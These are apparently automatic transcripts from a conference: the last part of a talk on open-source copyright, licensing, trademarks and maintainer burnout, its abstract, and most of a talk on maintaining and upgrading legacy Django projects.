or the journal world at some point in your life, and you have code in Django's code base, you still own the copyright to that code. That means the DSF doesn't hold the copyright for all of Django. Therefore, the DSF needs a license to distribute the code it doesn't own. This is why Django has contributed a license agreement. A CLA is a license that a creator grants to another project that enables that project to distribute their code contribution under the same license as the rest of the project. It's that license that allows the DSF to license Django as a whole. So if you have contributed to Django, make sure you have signed a CLA. And if you work for someone else, make sure they have signed a corporate CLA saying that they are allowing your contributions to be used by Django. A contributor license agreement isn't the only way to address the licensing issue. It's the way that the Django project currently uses. A much more lightweight mechanism is something called a developer's certificate of origin. A DCO is the mechanism used by the Linux kernel, by Docker, the B-Ware project, and a number of others. The DCO is a statement that's made by the contributor that verifies that they wrote the code, that the contributor has the right to license it, and that you're willing to grant the project a license to redistribute it. All that's required to acknowledge DCO is actually a single line of text and a commit message. It's put signed off by your name, your email address, where that name and email address matches your Git credentials, and it's done. When it's merged in, that becomes the Git history because the Git commit message is part of the hash. It therefore can't be modified and we've got a permanent proof that you actually signed this piece of code. And so many things. Easy. Git even gives you a command to do this for you. If you pass in the minus S flag when you commit, Git will add that sign offline for you based upon your Git credentials. A third option is to transfer ownership entirely. Now, this is obviously the heavy-handed approach. When you submit your patch, you sign over all your property rights to that patch. However, some projects do require this, most notably the GNU, the core GNU tools, because they have a political goal. They want to ensure that, potentially, they could go to court and defend the GPL. And they don't want to get thrown out of court on the technicality that they don't own the copyright for the code that's being licensed. So they require you to give them ownership of the code and you lose all your property rights. There's a more common form of ownership transfer, though. That's when software is developed as a work for hire. If your employer pays you to develop a piece of code, you've probably signed an employment agreement that says your employer owns your creative work. But not always and not necessarily by default. Check your employment agreement. Check your local legal jurisdiction. Check twice if you're a freelancer or contractor. Because if you're writing code for a living, it's really important to know whether you own the copyright or your employer owns the copyright. Because if your employer owns the copyright, you cannot take that code that you've written and use it in your next project for your next customer, unless you've been granted a license to do so. So, assuming you are the copyright holder for a project or at least a license or of contributions, how do you grant a license to your end users? Well, there's a number of ways to do it, but the easiest way, the way that sort of becoming expected practice in the GitHub era, is you put a single license file in the root of your code tree. Just contains the contents of the legal agreement that you're asking users to comply to. And how do the users accept that license? By using the code. The license will usually have text to the effect of, by using this code, the user agrees to blah, blah, blah, blah. There's no need to sign anything for that license to come into effect. It comes into effect through use. But what license should you grant? Well, that's entirely up to you. After all, it's your creation. It's your copyright. But if you're managing an open source project, allow me to offer some advice. First off, use one of the well-known licenses. The open source initiative recognizes 78 different open source licenses as being compliant with open source guidelines. But even they suggest that you stick to one of the well-known ones. I don't even remotely have enough time to dig into each of these licenses in detail. There are plenty of other videos and articles and resources that analyze what each of these provide and will help you pick the best license. But before you pick a license, consider what it is you're trying to achieve. What do you want to be able to use your software for? Who do you want to be able to use your software? Are there particular users or users that you're trying to encourage or prevent? Are there particular threats to your project that you perceive? What will be the impact of competing projects or competing implementations or hostile forks? Don't just pick one. Pick one that's going to help you achieve your goals for your project. Your choice of license is also a signal about how you perceive your project and its interaction with other pieces of the software environment that's used in. To that end, it's worth looking at the social signals your community is sending. Django is, for example, a BSD heavy community. You're totally free to use another license if you want. But if you release a Django project under the terms of the BSD license, then you're signaling that you're broadly aligned with community norms. Also, keep in mind what it is that you're writing. The terms of the GPL use lots of software-specific terminology. Those terms may not provide the best protection for your work. Maybe you should choose a different option. And you can use different licenses for different pieces of your project, the code under BSD, documentation under Creative Commons, for example. As long as it's clearly communicated what license applies where, you're set. You can, if you choose, offer multiple licenses. Remember, a license is an agreement between a licensor and a licensee agreeing the conditions of use. You can offer me multiple sets of terms that I might wish to accept. I only have to accept one in order to use the piece of code. If you have competing interests, for example, commercial users and open source community users, you might want to offer two different licenses on two different sets of terms. The only thing you can't do is not provide a license. If you don't provide a license for your code, if you don't have a license file in your route of your repository, or some other indication somewhere in your code of what license the code is available under, the default terms allocated by copyright law are all rights reserved, even if you don't say that. That means that nobody can legally use your code. And if you see code with no clearly offered license, you cannot legally use it. This even applies to code snippets. It doesn't matter how long that snippet is, it's still a creative work. The owner, the author, still owns the copyright. So you need a license to use that snippet. Sites like Stack Overflow get around this through a user agreement. Part of your agreement as a user of Stack Overflow is that all your contributions are licensed under a creative commons by share alike with attribution. You agreed to this when you created your Stack Overflow account. And so, through having accepted that agreement, you can use any snippet on Stack Overflow as long as you've got an account. But what if you want to publish a snippet somewhere other than Stack Overflow? You don't want to manage a license, but as a creator, you also can't just throw up your hands in the air and say, I've given this away to the public domain. As the creator of a work in some jurisdictions, certain rights cannot be transferred. Issues of copyright are closely attuned with a concept known as moral rights, rights that are considered innate to the human experience. The problem is that moral rights are very jurisdiction dependent. Moral rights recognized by European and in particular German courts are much stronger than the moral rights recognized by US courts. So, if you declare that you've released your code into the public domain, that is actually illegal in Germany. German courts won't recognize that transfer of ownership to the public domain any more than they'd recognize a legal agreement to sell yourself into slavery. Your moral right to fair compensation for your creative work is a moral right that is considered unalienable. And so, your work reverts to its default license. All rights reserved. And then Germans can't use your code. The other thing you shouldn't do, don't write your own license. And that includes taking a well-known license and adding some custom term. The common licenses and their interactions are all well-known quantities. Lawyers know how they work. There's a body of scholarly research on how they affect projects, how they affect companies and so on. I am old enough to remember when open source licenses were shunned by commercial organizations simply because lawyers didn't understand them yet. They're complex. The consequences for mistakes were huge. And so, lawyers were, as they always are, conservative and said, no, that's their job. We've broken down that barrier now, but it's taken decades of advocacy and lots of work by the legal community. And you can leverage all of that work simply by picking a known license. If you write your own license, you have to break down those walls by yourself. It's also really easy to introduce unexpected consequences. JSLint is a really good example. JSLint's license is the MIT license with one appended clause. This software must not be used for evil. Oh, how cute. The side effect is that most Linux distributors cannot distribute this code because they cannot ensure that their users are not going to do evil. IBM's lawyers even went as far as to go to Douglas Crockford, the writer of JSLint, and get an explicit license from the author to do evil. So unless you have a really good reason, and let's be clear, you don't have a good reason, don't rule your own license. Now, legal concerns don't stop with copyright. Copyright is about the work itself. How you identify that work is a separate issue entirely, and that's where trademarks come in. A trademark is literally a mark of trade. It's how you identify your work. It can be a word, a symbol, a set of colors, a shape, a combination of all those things, anything you use to identify your project. How do you get one? You start using a word to identify your product or service. You don't have to do anything else. As long as you're using a name, you can assert trademark rights. You can, if you want, go through the process of formally registering a trademark, and that's done on a pernation basis. It can be done internationally, but obviously it's a lot more paperwork. Registration, though, doesn't give you any more rights. It just makes it easier to claim your rights, because you've got paperwork that says when you started using your trademark. As an example, how many people know what this is? Does it look familiar? It's an Australian fast food restaurant chain noted for their signature burger, the Whopper. There's a problem. In Australia, when Burger King came to Australia, there was already another company using that name. They only had one store in Adelaide, but they had the trademark. Burger King had to pick another name. It didn't matter that they were a bigger company, that they were an international company, that they were going to make better use of the name. There was an existing trademark registration, and they had to change their name. They chose Hungry Jacks because that was a trademark the parent company already owned. It used to be a pancake mix made by Pillsbury. Another example that's close at a home. A couple of years ago, British organisation tried to register a trademark for the name Python to describe cloud software. They claimed ignorance. They didn't know that Python was used in cloud software already. The PSF lodged a complaint arguing prior use and the company backed down. This wasn't done because of the US trademark registration. A US trademark registration doesn't hold much weight in Europe, but the PSF was able to demonstrate that the name Python had been used for cloud software for many years prior to this registration, and that company made the trademark application moot. Trademark applications are also scoped. A trademark is generally only granted for a specific subject area. In the US, there are actually three trademark registrations for the name Django. The DSF usage is for downloadable open source computer software for use in connection with internet publishing and website development. So no one else can get the name Django registered for that purpose or use the name Django for that purpose. A second registration is for picks for guitars and other musical instruments. So it's held by Breezy Ridge Instruments right here in Pennsylvania. So if the DSF wanted to start selling Django brand guitar picks, it wouldn't be allowed to, or at least Breezy Ridge Instruments could stop the sale really easily. The third registration is for perfumes, rouge, face powders, toilet waters, cologne waters, cosmetic skin trims and lotions, lipsticks, nail lacquers, hair lotions, lotions for the beard, bath salts, talcum powder and dentrifices. Luckily, this one expired in 1971, so it's clearly just a matter of time before the DSF starts selling Django brand beard lotion. I don't know exactly, yeah. So does this all really matter? Yes, a trademark is what lets you stop other people from doing bad things in your name. And this isn't an abstract idea either. The DSF had to stop lawyers, had to engage lawyers to stop someone selling Django 2.0. It was Django 0.96 with enterprise features, like a lack of bug fixes. Now, the thing is, this was a completely legitimate use under Django's source code copyright license. But Django's trademark belongs to the DSF and it can't be used without the DSF's permission. And as a result, the company was told, or put on a headlock and told, to stop doing it. Now this raises an interesting question. What happens when it comes to open source projects, how do you get permission to use the trademark? On the one hand, you want the Django community to be able to use the Django name, but you also have to protect the community from nefarious actors. The answer, once again, is a license. If you want to put a commercial logo on your product, you need to get and usually pay for a license to do so. In the case of the DSF, there is a license for the Django name and logo, just a much more liberal one. And once again, if you don't have a license to use that trademark, you can't use it. Except, the one exception is something called nominative use. Nominative use is the usage that is necessary in language to name a thing. If I wanted to say Django was released in 2005, I can't do that without using the name Django, or at least it would be very cumbersome to do so. So trademark law calves out nominative use as a specific exception. However, that nominative use doesn't stretch to logos, typefaces or other forms of identity. It's just the word, so you can use it to refer to things. The one thing that isn't nominative is incorporating someone else's trademark into your own. One of the tests for nominative use is whether your usage would confuse someone into believing there was an association between two products. So the best solution, if you're going to set up a company, please don't incorporate someone else's trademark into your own. So don't call yourself Django software consultants, because that gets you into some very messy territory. So far, I've been very much focused on the legal aspects of maintaining an open source project. But it's important to know that measures of success for a project are much more than just covering your butt. I'm going to talk about two others, one briefly and one in more detail. We are, for the most part, techies, and I know the drill, we hate ads, we add salespeople. Sales and marketing is very, very important. I'm going to give a second talk this afternoon that covers this part of the puzzle, so come along. And now, trigger warning, I'm about to start talking about depression and burnout. So there are some aspects of open source projects that are almost unique to open source. One of you will know a children's book called The Giving Tree. For those who don't know it, the book is the story of an apple tree and a boy who are able to communicate with each other. In his childhood, the boy enjoys playing with the tree, climbing its trunk, swinging from its branches. As time passes, he starts to exploit the tree. Initially, he just sells the apples, then he cuts the branches of the tree to make lumber for a house, then he cuts down the trunk of the tree to make a boat. Each progressively, a destructive stage is promoted by the tree itself, it ends with a sentence, and the tree was happy. The final page of the tree, sadly, says she has nothing left to give, as her apples, branches and trunk are all gone and only a stump remains. The story is sometimes told as a parable of the joys of giving and selfless love, but it's also cited as an example of an abusive relationship. And in both interpretations, it's a story that's a really good analogy for open source communities. If you're maintaining a project, it's really easy to keep giving of yourself until you have nothing left to give, especially if it's a project you started or you invested a lot of your own time in it. Helping other people gives you a great rush. Seeing other people use your project is a great feeling. But it's also really easy to fall under the trap of giving until you don't have anything left to give. On the other end, it's easy to keep taking and without realizing the load that you're putting on the person who's giving. I've made no secret of the fact that I've been struggling with depression for a couple of years now. A big part of the reason that I stepped down from the DSF last year was that I came to the realization that I was giving too much of myself to Django. I wasn't growing new branches. I had reached the point where I was just a stump. But I didn't want to step down from the DSF because if I didn't do it, who else was going to do it? You know what? Turns out this is an awesome community. And when I said I was stepping down, people like Frank Wilde stepped up and took over. If this was a commercial, a primarily commercial community, that decision's easy. You don't like your job, you change jobs. It's not quite that simple, but you can change jobs. You're exchanging money for labor. You stop getting paid. You're not expected to provide labor anymore. And you're not only, you're only reasonably expected to have one job at a time. But in a volunteer scenario, the exit path isn't as clear. It's easy to acquire responsibility, but a lot harder to divest it. As an individual, you need to make sure you look after yourself. As a community, you need to build structures so this doesn't happen. One way to do this is to institutionalize exit from key roles. Set term limits, or at the very least, provide regular opportunities where an active opt-in is required. That regular requirement for an opt-in means there's an opt-out point as well. Responsibility shouldn't last forever. Better still, set up community structures where the expectation of free labor is minimized. If you're identifying a role that's going to take resources, be it material, labor, emotional energy, don't just assume those resources will be available forever in boundless quantities. The greatest shocks occur when something we assume is plentiful and ubiquitous disappears. Gasoline, electricity, clean water. If your open source project isn't planning for the day when your biggest contributor steps down, your project has a clock on it. And if you're a commercial organization who depends on that project, I would argue you are being criminally negligent to your investors because you have not secured your supply chain. You haven't mitigated the key risk associated with using that software. This approach helps to stave off burnout amongst your volunteers, but it also has the added benefit that it broadens the list of people who can do the work. Volunteers, by definition, are made up by those who have the time to volunteer. If you've got a family or children or a loved one who needs care, that limits your ability to volunteer. You want to address diversity? Make sure you're not just taking from the pool of people who have copious free time, which, broadly speaking, means white, middle to upper class, Anglo-Saxon men aged 16 to 30. And if you are someone who uses open source, don't just take. Give back intangible ways, either with hard commitments of time or with cash that organizations like the DSF can use. And this is especially important if you're a large organization that has extraordinary resources at their disposal and who derive immense benefit from open source and their volunteer contributors. So, there's a survey of a few important things your parents didn't teach you about sharing your toys. Run along now, children, share your toys and have fun. Just be careful. Make sure you're home in time for dinner.
|
In this talk, Russell Keith-Magee will bring the experience born of 25+ years as a software developer, 10 years as a Django core developer, 5 years as DSF President, and 5 years as a business owner to expose you to some topics that every software developer should know, but often aren't covered as part of formal training. This includes legal topics such as copyrights, licensing, and trademarks, the role played by codes of conduct, and some of the non-code skills that are important for successful projects, and essential for successful entrepreneurship.
|
10.5446/32725 (DOI)
|
Come on, y'all! MUSIC We'll do a mic check now. It sounds good. All right. Great. So again, it's Ben Lopatin. I'm a co-founder and principal developer at Wellfire Interactive. I'm 50% of the company. We're based in the DC area. I'm out of Upstate New York. And I am Benny Lopatin. Pretty much everyone on the internet. And that's also what I look like pretty much everywhere on the internet. And I have for the last decade plus. So today we're going to talk about legacy software. Legacy Django specifically. And I want you to think for a moment about legacy software. What do you picture? I want you to sort of picture something in your head. It might look a little like this. But the mind does wander. These aren't on fire. You know, something else. It conjures up all kinds of things. Well, that wasn't also a pony in the first slide. So there you go. What we want to do before we start is define our terms. So what do we mean when we talk about not just legacy Django, but legacy software in general? And there are a few definitions that we'll work with. The first is just code that someone else wrote. You know, at the risk of begging the question, a philosophical question about identity, this could also be past you. Okay? If anyone's ever looked at code that you wrote like a month ago, I was going to say a year ago, but a month ago might suffice. This could be considered legacy code. Michael Feathers, who literally wrote the book on working with legacy software, defines it as code with no tests. I think this is a good example of a characteristic of legacy software, but I don't like this as the definition. The reason it calls this is basically a code that you don't know if you're improving it when you make changes. I think that's pretty accurate. Another that I want to go with a little bit more strongly is that it's software that's in production. So if you write code, there's basically this two-way fork, like the decision tree, what can happen with the code. It can be used or it can be not used. So if you have code that's not being used, it's probably thrown away. It doesn't really matter anymore. It's code that's used. So here we have this bridge. It's an old bridge. I imagine it's still there, but this is a bridge that's in use. All right? And that'll actually be a little bit important as we go. So the reason this is important is because this written software is an investment. There's this literal investment potentially of time and money that went into it, but it's already there. You already have a lot of information that's encapsulated in this software. And as much as it might pain us to say, a lot of these systems still deliver value, and that's the point of the software, is to do something. There might be people depending on this. And actually, we know there are. Does anyone here bank at all? They're using legacy software. And the world runs on it. It's out there. That's not to forgive it and say, ah, well, let's just live with it as is, but is to acknowledge that it's out there and that we need to work with it. So when we talk about legacy Django, let's define this a little bit more tightly. It's really not going to be that different, but there's some characteristics that we can talk about with Django. I think the first is going to be pretty obvious. You're likely working with an outdated version of Django. Your product's dependent on an outdated version. You could also have some issues around how it's deployed. If you have Django 1.3 product, that might be a problem enough, and it's deployed with modPHP, let's say. And so now you have this other issue that kind of compounds the problem. You could have no tests in the project. This is not the worst problem you can have with regard to tests, and we'll get to that. So you can also have some older dependencies in there outside of Django. And again, these are not, by and large, totally unique issues to Django, but we're going to be talking about this in a way that kind of, how we work with Django, there's certain patterns that, there's certain kind of patterns you might see in legacy software, and they show up in certain places in Django. So when we're talking about this, I want to bring out some assumptions. Obviously, one of them is we're working with Django. Another one is that the soft assumption we already mentioned, you're probably working with an outdated version of Django. A really important one, which is not necessary, but it's going to be that we're working with the project that you're, you know, so you come onto, that it's already running in production, that people depend on it, right? So it's not like, oh, here's a project, here's some code. We're thinking about redeploying this. Everything we're going to talk about still applies, but it's a little bit different, probably a little bit simpler to solve. And of course, since it's in production, people are still relying on it. Now, the goal in all this is to improve the code base to, let's say, maybe fix bugs, add features, that's probably why, if no one wants to do anything to the code base, like fix bugs or add features, you have to ask, why are you doing anything with it? Those are really the only reasons you're going to be working on the code. And so the goal is to make these really discrete steps as you go. There's an analogy that a friend uses that, you know, this is, it's like working at an old house, so this old home is from this old house. I like the analogy of a bridge. So a bridge is going to span two points and let people get from point A to point B. They can fail catastrophically. The goal is to try and do work on it before it gets to that point, but you have to keep the bridge open as you go. And so that kind of goes into our assumption about, you know, people still getting value out of this. Now, I'm going to tell you a lot about what to look for and then some solutions. It's not, this is not codified. These are things that I've kind of picked up after, you know, I've spent more time working on existing Django parts than I have creating Greenfield work. And, you know, from a lot of this is, I've written stuff that you might consider legacy. I had to work on it later and I've worked on code that all kinds of other people wrote, sometimes other Django agencies. So you might say that it's just like my opinion, man. I think that's what it's worth, but it is based on some learnings. So the first step, when you get to a legacy body, just code review. You want to assess what you have. This is going to be like the first step in the Udall loop, you know, you have to orient, observe, decide and act. The reason why is we need to get some context. We really need to understand where the product is coming from, where it's at before you can start making changes to the code base. So this first step is actually the zero step is to ask questions. This is talking to people. Find out they might be stakeholders, it might be your manager, it could be clients. And you want to get some understanding from outside of the code base. You want to know what is this supposed to do? Someone might know that. You know, someone might, this is an old code base, there might be someone who's new and say, well, this is what it does. And someone else will say, well, it's supposed to do this. You want to know about known bugs. This is really important, I think. Before you start digging into the code base, find out what you can about known bugs. And then plan features as well. This is going to influence how you look at the architecture. This brings you to reading the code. This is an art, not a science. Basically what you're going to be doing is looking for, you want to get an idea of what it does. Look for things like, I don't know, confusing areas in the code base. Look at the architecture. Code smells are going to be a big one. The style and see how is this written. Knowing what some of those bugs are beforehand too will help you. You might even see bugs that are obvious as you read through it. You might see some that wouldn't have been, but they are now because someone told you about an issue. And right at this point, you're just basically taking notes. Remember, we're not making any changes to the code base. There are some tools to help you with this. The main ones are going to be reading it. There's really nothing more you can do to get beyond that. But some of these tools will help get you some understanding of what's going on in the code. So I pretty much, I use Flake 8 and PyCharm as well. They didn't pay me to say that. And you can also use Pylint. And what these are going to do with Flake 8 is going to combine some sort of stylistic analysis. If you're not easy to write in, I'm going to guess a lot of people are. And some static analysis for code. And what we can, this could be a lot. This could show you a lot of errors. And what I've done is I have a script that I've linked on a blog post. Basically, we just take this output and give you a summary of what this looks like on a module by module basis and an error type by error type basis. Because if you find out that there's a whole bunch of modules that have like, oh, there's no spacing on an operator, that's going to impact how you read it. But it's not going to, it's not that serious. Whereas you find out there's a whole bunch of names used places that are never defined, that might be a source of runtime errors. So you want to kind of categorize this as you go. Now, now that we've kind of done this, it would seem that the obvious next step is to get into testing. But I'm going to suggest there might be an intermediary step, and that's adding a little bit of logging. If you remember, we wanted to talk to people, interrogate them about some of the issues in the code. And basically what I want to do is understand production errors. So, again, there's another sponsor. They're not paying me to say this. They're sentry credit for this. You don't have to use them. It could be a similar service. And you want to just add in this exception handling. It's not good enough to get emails about an error to like a mailbox that no one's checking. You want to get these, you want to make sure you know what's going on, get good stack traces. And there's also a point which I'd suggest making some code changes before getting, looking at tests. And that's code looks like this. When you see this in a code base, it's probably not going to even look like this. It's probably going to be like 20 lines. And there's some calls to external services. And then there's like an accept clause. And maybe there's like one, but it's just like, you're accept. Chris wrote this. Yeah, maybe there wasn't time. Maybe this was a temporary thing. Maybe the code was going to be thrown away. Who knows? But there are exceptions here being swallowed. And maybe it's acceptable to some degree because this is some sort of customer view. And they don't see this. And so it's not that they could deal. But this could be hiding bugs. So what you can do is you can go ahead and add some logging here. If you're not familiar with the exception logger, basically what it's going to do is it's going to send the whole stack trace out. So if you're using something like Century, you'll get what looks like an error message. It's never raised. But you'll get the full stack. So you can see what's going on. This will allow you later to come back to this code and properly address it. And that brings us now to testing. In case you're wondering why testing, I'll give you a little visual prompt for why. I even talked before. I had a whole bunch of screenshots of that from airports. This is going to help you fix bugs. It's going to guide development. You don't have to do religious, text-driven development. You can do a little bit of that. And it's going to be deployment confidence. You know that we have close to 100% confidence that what you deploy is going to work. And what I want to tell you is that test provide information about code quality. Again, that's going to be key in more than three or four slides. But that's the goal. It's going to tell us what's going on. So that's, of course, if we have tests. So what are the test suite scenarios? You've come to this new project. Basically, if Dr. Seuss were writing about tests, this is how he would write about the scenarios. You could have a few. You could have great tests, no tests, bad tests, low tests. Great tests are great. This means you probably have a lot of coverage. They're meaningful tests. I want to put emphasis on that. Coverage is a great metric, but it is a false God. Do not worship it. It just means that every line has been evaluated. You could have junky tests that don't test every type it can go in. And you could have failures because you didn't test that because they weren't meaningful. So it's good. Coverage will tell you where the mice are dragons, but it's not going to tell you that this is amazing. So that, but this is, you know, if you have great tests, then you're probably golden. Everything's passing and it's passing because these are good tests. You could have no tests. Again, not the worst scenario you could have because at least you don't have any noise. So we have signal and noise. Bad tests I think are the worst scenario you could get, especially if they're combined with slow tests. Now, bad tests could be that you have coverage. Everything works and it's just a bunch of stupid tests. I don't know. Someone went through and just like, someone patched the like test case class so that all the asserts always pass. I don't know. It's stupid, but they'll pass. Like, hey, but these are terrible tests. You could also have tests that are failing because you have test drift. You know, people just started, you know, no one was running the tests and they were making changes to the code base and not, you know, up to any tests. You could have errors for very similar reasons. This is bad. This is, this is not information. This is just telling you that the tests are not good. It's not telling you anything about the code base. So the strategy I would recommend here is any of the changes are making to the code base are making incrementally. What are the same thing with these tests and basically the first thing you're going to do is silence anything that is bad, especially if you don't know why. Because really what you want to do if there's a test that's failing, there's an error. It indicates that either the test needs to be fixed or the code underneath it that's being tested needs to be fixed. And if you can't figure out what that is at first, silence the noise and wait till you can come back and see if you can get signal out of that. And of course we have slow tests. Slow tests are bad because no one wants to run them. It's terrible. This could mean like it takes five minutes to run the test suite. I came under a project where it took 90 minutes to run. I ran it a few times. I stopped it after like 20 because my computer felt like I went to sleep. And I asked the client, I said, yeah, it takes 90 minutes after I ran it on another server and since somewhere. So the solution there is to speed these up. Now the reason those tests are really slow is because they were really fixture dependent. I would argue kind of outside of the scope of this talk that using heavy fixture files in general is not the best idea. But if you have a legacy project, you might have a lot of them. We're talking like thousands and thousands of records and every single test case loads all of these. And that's where all the time comes into play. It could also be because the code underneath the test is slow. It could be because you're making the code or the test making calls to external services. So these are basically all anti-patterns. What you have to do is figure out, you have to prioritize which of these you're going to speed up first. So with fixtures, I was able to get these down to 90 seconds with like four lines of code by just using Django NOS and the fast fixture test case. If you want to use that, it's not currently supported in the latest version of Django NOS, but I have a four-con GitHub that does. But it's not tested. You can't have everything. And you can also make sure you're not using the database excessively, make sure you're not taking too much I.O. That could mean not saving models and you just need to test the method on a model class that just uses something on the model or mocking. And mocking is great for this. So that's going to help kind of give you a guidance of what's there. When you're adding any kind of new tests though, we want to prioritize, especially if you have no tests, how we add these in. Because there might be a temptation. We'll just write a full test suite. If you add that temptation, you should probably put it aside, especially if you have code that's in production you need to make changes to. The first thing you're going to prioritize are bugs. This is actually, it's a beautiful millipede from Virginia. So it's not really not a bug. But you'd want to add in tests for bugs. Anytime you have a bug, you write a test port and you fix it. That's probably not new to most of you. The next, I'd say, is what I'd call the smoke tester, these integration tests where just load the views. If you don't have any tests, there's a lot of stuff you want to test. One of the basic things you do is just do some client, using the Django test case client to load views. That's going to be a, it's not the cheapest way of testing, but it's going to be the quickest way of testing a lot if you don't have any tests. And that's really important when upgrading Django is urgent because you want to get as much tested as possible. And then anytime you add a new feature, you should be adding this, and refactoring. So refactoring is by definition, it shouldn't be changing how code works. It should really just be changing names and extracting code. This is a really good opportunity to add tests for what you're refactoring. And then that brings us to the upgrade. This is everyone's favorite part of working with legacy Django is upgrading to the newest, best Django version. Because within, you know, an hour of work you're done and you're on Django one night. It's an hour, different, you know, relative time. The issue you're going to have here is not only is backward compatibility, so, you know, all kinds of things have changed in each Django version. It could be as simple as, you know, URL patterns has deprecated or it could be that you're using, you know, get query set was renamed. And you've got to fix this in your code. The superpower here is going to help you do this as talks. I'll repeat it. Talks is a great, it's a test tool. If you're not familiar with it, it's predominantly, you've probably seen it in with reusable apps, other Python libraries, and it controls testing environments. You can have isolated testing environments for a matrix of whatever you want, all kinds of dependencies. So you usually use it with a Django reusable app, but it's really useful with your own project when you want to test a small matrix. Like, I want to test this code base against the current version of Django and the next version and the next version and maybe see where I have some issues. So the way this works is you set up a TOX file, this is your configuration file. The reason I want to point this out is that you'll see that I have, there's a requirements file that we're installing the dependencies from, and then Django is isolated separately. The one thing I found doing this is that you do need to pull the Django version out of the requirements file. So, you know, that would be like a, say, a root requirements file in this case. And then you can define it here. So we're going to run these tests against each of these versions of Django. And that's a really great way of kind of doing this in place. You can see what code, you know, how code works. You could potentially change your code base, get it working in this version, whatever version you have deployed and the next. And then at that point, just deploy the changes and then upgrade Django. That's kind of a nice way of doing it. The goal is going to be getting to an LTS version. I don't care if you want to get to like, you know, 110, you get to the LTS version first. For a lot of legacy apps that are in production, that's probably just, that's what you want to do. That's your baseline is to go from LTS to LTS. But this is, this is really not even the fun part. The fun part is working with all the dependencies that you probably use. These reusable apps. These pose a few minor problems. You can have some integration with obsolete libraries in there. Hopefully no one is working. Hopefully you don't have to do too much work with soap in Django. And there's a lot of new libraries out there for that. But like there was a gap where there was nothing new and you were pretty much screwed. Oberspecification. And this is not an issue in your project so much as the dependencies where dependencies over specified a version compatibility and you're screwed. Because you get versions, port mismatches. So here's a diagram of, this is what versions look like. I don't know if you guys know this but this is what they look like. So here we have, the bottom is going to be the lowest version of Django that the teal packages can battle with in the top is the uppermost. Whether or not these are specified by the way. This is just what we actually have. And so the orange is the current Django version. And now you upgrade and now you have this. You have packages that have not been updated. You have packages that have been updated and you're like, you know what, we're not supporting that version anymore. And this is the problem you're going to do. So you have to solve this, right? That's why we're here. It's for solutions. The first solution is what I call patch and thread. Where it's a, you know, there's an upstream and it's on PyPI. And you know what, I'm going to be helpful. I'm going to, you know, patch this, make it work with the next version of Django. And then you have a pull request and within a couple of hours, this is going to be up in PyPI and we'll be good to go. That's how it works. If anyone's done any work in a project that, you know, it's the weekend. You have stuff to do. You don't want to do that. Or maybe you don't care about the package anymore as the maintainer. So this is not a bad strategy to take, but it should not be your first strategy. It should be like a secondary. Another strategy is to fork. Now this could be forking as another published project. It could be forking to a private index. Or it could be forking and using your forks version from Git, you know, or Mercurial or Perforce. I don't know if you guys use Perforce. But you can do that. And you can also kind of vendor it and have a vendor fork where you've actually had the code just sort of added to your code base and work on it from there. Related to that, you could just extract what you need. You might just be using one or two modules and it's this huge app, you know, it's got models with, it doesn't even have self-migration. And there's all this other crap. And you're like, I just need this template tag library. I just need this. And I actually don't even need to change anything because there's nothing in there that's incompatible with the version of Django I've got. So you can just pull that out as a separate app, you know, vendor, and they're good to go. Ideally with tests, but I didn't tell you this because you just include it. And of course you can just remove and replace. So you just say, you know what, we're not going to, we don't need this dependence anymore. We can make do with something here or we can find an actively maintained alternative. Some of the tools you might use for working with dependencies here are pure and pip tools. The reason I like pure is pure and you'll forgive me. This is the example from the pure site. I know it's not Django. You basically point it to a requirements file and it will look at your requirements and then read it. It'll update the requirements file in place with updated versions. This is good for just kind of testing to see what works. You just upgrade everything and say, great, let's see what breaks. So that's your dependencies. And there's some other issues you're going to find in the code base. I'd be remiss we didn't talk about formatting. There are stickers, I'll have more stickers later too. This is not a Django specific issue. It's not even Python specific, although since we have a standard, see it. If you guys saw the talk on readability, understand there's a readability issue. I think that a lot of the bad formatting you'll see can, it hides bugs. And so that's why it's an issue. It's not just an aesthetic issue. There are a few tools you can work with here. AutoPep 8 will automatically format and Python. Again, we can do some formatting. I am cautious about doing too much formatting like this one. There aren't tests in place. It should be kosher, but you want to be very cautious. Another setting, and really the issue with settings is not just gnarly settings, but secrets. Has anyone ever here, actually don't raise your hand if you've ever committed a secret to a leak. Keep your hands down if you have. It happens, there's some type of, this is the way it's written. So you want to get these out really. It's one of those first changes you make, and maybe with logging, get this stuff out. There's a tool for that called Bandit. It's a Python tool. It's part of the OpenStack project. And it will look for security vulnerabilities in code. It's just going to build an AST and do this. And it'll look for stuff like that. It's not 100%, but it'll give you some good signal. The other is just having one big app. You have this monolithic app, and you've got like 50 models, and a URL configuration that's got, I mean, it's just huge, and you can't understand what's going on. The solution is pretty simple. You break this up. The way you start with this, though, I think is with the simplest things. You know, URLs and views. You can do models too, but save those for last, particularly. And the way you move models is you use the DB table attribute in the Meta class, and just define the table name. You have the, you know, keep the table name where it is, and then a little bit of migrations dancing, maybe some squashings and faking. You don't change the database, but you make Django think you've moved stuff around, and that will work. Now, there is similar to this is these big views. Lots of logic and views. This is a hard to test. It's hard to read through. There are a few solutions to this. And this is kind of funny. There was a blog post in 2006 by James Buck about this in Rails. So we know about this issue. FAT models is kind of one of the solutions to this, putting a lot of the logic on the model itself. I'm a fan of humongous managers. If you guys saw the manager's talk, hopefully you persuaded this. There's a lot of logic you can put in managers that might be in your views, and it's just a much better place to manage. It's much easier to test here. And we could say expansive forms as well. And specifically a lot of, if you saw the form stock, you can do a lot of interesting validation there. And there's a lot, I think, that can be pushed to form validation out of views. It's not just views. Does anyone here use any management commands? Yeah. They're an interface. Views are an interface. Those are an interface. They should have comparable levels of logic in them. So management commands should really just take input from the, you know, from the command line, and then go out to another function. So managers somewhere else pull the data in. If you're doing like CSV munging in the manager class, you're probably doing it wrong. And in the end, we want to make as few changes as we can kind of sequentially. Refactor as you go. You don't have to change everything. You have a new feature. You can put that in the new app. If you're using some old code, making some modifications there, refactor that class or that module. And real quickly, just a few items that we didn't talk about. These all matter a little bit, some more than others. I'm going to help a lot when you're starting out and trying to get some of these changes out. But in the nature of time, I want it there. We do have a few minutes. If anyone has a question. Hi. I use PyCharm. And how do I use PyCharm to do code reviews? Well, so the thing I would use there is really for formatting the code and for reading through it. So yeah, and optimizing imports. And it'll show you too. I don't know what you need to have configured, but it can show you a lot of hints about like where something's going on. You see the little red here or yellow or something else like that. There's an issue. Great talk. Okay, so, and this is directly from experience with the legacy app that you're talking about. When you talk about having large managers, small views, I get that. I appreciate that. I run into situations though where there is way too much cross dependency between models. You have huge managers with logic that isn't really related to itself. Yep. Where do you start with that? I mean, I know that's part of the refactoring part of it. But I mean, it's one of those. If you want to keep traffic crossing the 